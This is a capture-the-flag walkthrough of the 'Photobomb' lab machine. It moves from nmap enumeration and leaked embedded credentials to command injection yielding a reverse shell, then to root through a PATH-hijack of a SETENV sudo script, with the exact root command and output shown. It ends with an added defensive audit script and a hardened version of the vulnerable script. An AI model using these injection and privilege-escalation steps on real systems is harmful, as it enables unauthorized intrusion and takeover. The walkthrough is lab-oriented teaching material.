Enumeration
Nmap
nmap -sV -sC <target ip>
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-10 10:47 EST
Nmap scan report for 10.10.11.182
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
| 256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_ 256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.36 seconds
Let's look at port 80.
Inspecting the page and its source code, we find photobomb.js.
Let's see what's in photobomb.js.
We get a special URL with embedded credentials: http://pH0t0:b0Mb!@photobomb.htb/printer
Now we are logged in as pH0t0.
We can see that we can download the images! Let's intercept that request with Burp Suite!
Looking at the intercepted request, we can see that the download functionality is open to injection, which we can leverage here.
Try a reverse shell! Visit https://revshells.com/ to generate one.
It's important to URL-encode the payload.
We got a reverse shell!
❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.182
wizard@photobomb:~/photobomb$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)
wizard@photobomb:~/photobomb$ hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a
wizard@photobomb:~/photobomb$ cat ../user.txt
c00**************************1d8
wizard@photobomb:~/photobomb$
Privilege Escalation
Looking at sudoers (sudo -l), we can see that we can run a script as root, and that we also have the ability to set environment variables (SETENV).
wizard@photobomb:~$ sudo -l
Matching Defaults entries for wizard on photobomb:
secure_path=/usr/local/bin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
wizard@photobomb:~$
Looking at the script, we can see that it calls find by its bare name rather than by absolute path, so the binary is resolved through PATH.
wizard@photobomb:~$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
wizard@photobomb:~$
We can take advantage of being allowed to set variables such as PATH: if our own directory comes first in PATH, the script picks up a custom find, and because the script runs under sudo, our find runs as root.
Congratulations!
This is the command that gives you root privileges: sudo PATH=$PWD:$PATH /opt/cleanup.sh
wizard@photobomb:~$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:~# id
uid=0(root) gid=0(root) groups=0(root)
root@photobomb:~# hostname -I
10.10.11.182 dead:beef::250:56ff:feb9:240a
root@photobomb:~# cat /root/root.txt
344**************************a18
root@photobomb:~#
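As an added example that is not part of this writeup, here is a small audit helper that lists the commands a script resolves through PATH, run against a copy of /opt/cleanup.sh as shown above and against a hardened variant that pins PATH and uses absolute paths; the weak.sh and hardened.sh file names and the pinned PATH value are assumptions for the demo.

```shell
# Added example (not from the writeup): list external commands a script calls by bare name,
# i.e. resolved through PATH at run time; a SETENV sudo rule lets the caller control that PATH.
# Print bare command names in script "$1", sorted. Heuristic: whitespace words; ";" is split out.
list_bare_commands() {
  awk '
    /^[ \t]*#/ { next }                       # skip the shebang and comment lines
    {
      sub(/[ \t]#.*$/, ""); gsub(/;/, " ; ")  # drop a trailing comment, isolate ";" (and "\;")
      cmdpos = 1                              # the first word of a line is in command position
      for (i = 1; i <= NF; i++) {
        t = $i
        if (t ~ /^(;|&&|\|\||\||-exec|-execdir)$/) { cmdpos = 1; continue }
        if (!cmdpos) continue
        if (t ~ /^(if|then|else|elif|fi|do|done|while|until|for|!)$/) continue  # command still follows
        if (t ~ /^[A-Za-z_][A-Za-z0-9_]*=/) continue                        # VAR=value prefix
        cmdpos = 0
        if (t ~ /^(\[|\[\[|test|cd|echo|exit|return|set|export|source|\.|true|false)$/) continue  # builtin
        if (t ~ /^\//) continue               # absolute path: no PATH lookup
        print t
      }
    }' "$1" | sort -u
}
# Constructed copy of /opt/cleanup.sh as shown above, plus a hardened variant that pins PATH
# and calls find and chown by absolute path; both are written into directory "$1".
write_scripts() {
  cat > "$1/weak.sh" <<'EOF'
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
EOF
  cat > "$1/hardened.sh" <<'EOF'
#!/bin/bash
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
cd /home/wizard/photobomb || exit 1
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]; then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
/usr/bin/find source_images -type f -name '*.jpg' -exec /bin/chown root:root {} \;
EOF
}
dir=$(mktemp -d) && write_scripts "$dir"
for s in weak hardened; do echo "$s.sh resolves via PATH: $(list_bare_commands "$dir/$s.sh" | tr '\n' ' ')"; done
```

Against the hardened script the caller's PATH no longer matters, because the script overwrites it before any lookup; removing the SETENV tag from the sudoers rule closes the other half of the problem.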